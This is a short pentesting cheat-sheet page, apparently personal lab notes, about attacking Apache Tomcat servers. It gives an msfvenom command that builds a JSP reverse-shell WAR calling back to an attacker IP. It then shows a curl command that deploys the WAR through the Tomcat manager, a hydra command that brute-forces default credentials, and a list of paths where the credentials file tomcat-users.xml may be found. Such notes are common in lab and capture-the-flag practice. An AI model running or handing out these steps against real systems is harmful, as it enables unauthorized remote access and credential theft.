Tomcat¶
- AJP / port 8009
- Tomcat proxy that gives localhost access to the machine
Reverse shell¶
Deploy .war reverse shell
```title=Generate payload" msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.83 LPORT=4444 -f war > shell.war
```title="Upload the shell"
curl -u '<username>:<password>' http://10.129.241.149:8080/manager/text/deploy?path=/shell --upload-file shell.war
- Upload locations
- manager-gui - /manager/html/
- manager-script - /manager/text/
Brute force credentials¶
hydra -C /seclists/passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.0.0.25:8080/host-manager/html
Interesting Files¶
List of user credentials and permissions.¶
This file can be in multiple locations. $CATALINA_BASE/conf/tomcat-users.xml is the configuration file, but any of the below locations could be linked to conf/tomcat-users.xml
- tomcat-users.xml
- /etc/tomcat9/tomcat-users.xml
- /opt/tomcat/apache-tomcat-9.0.54/conf/tomcat-users.xml
- /usr/share/tomcat9/etc/tomcat-users.xml
- /var/lib/ucf/cache/:etc:tomcat9:tomcat-users.xml
- /usr/lib/systemd/system/tomcat9.service
- Will show CATALINA_HOME and CATALINA_BASE variables
Find other files¶
Search apache version + Ubuntu to find the ubuntu distribution that is most likely running on the box. Then google the distribution name + tomcat in order to find the tomcat file directories installed on the box.
Install tomcat and search for the location on your own box. Example: sudo apt install tomcat9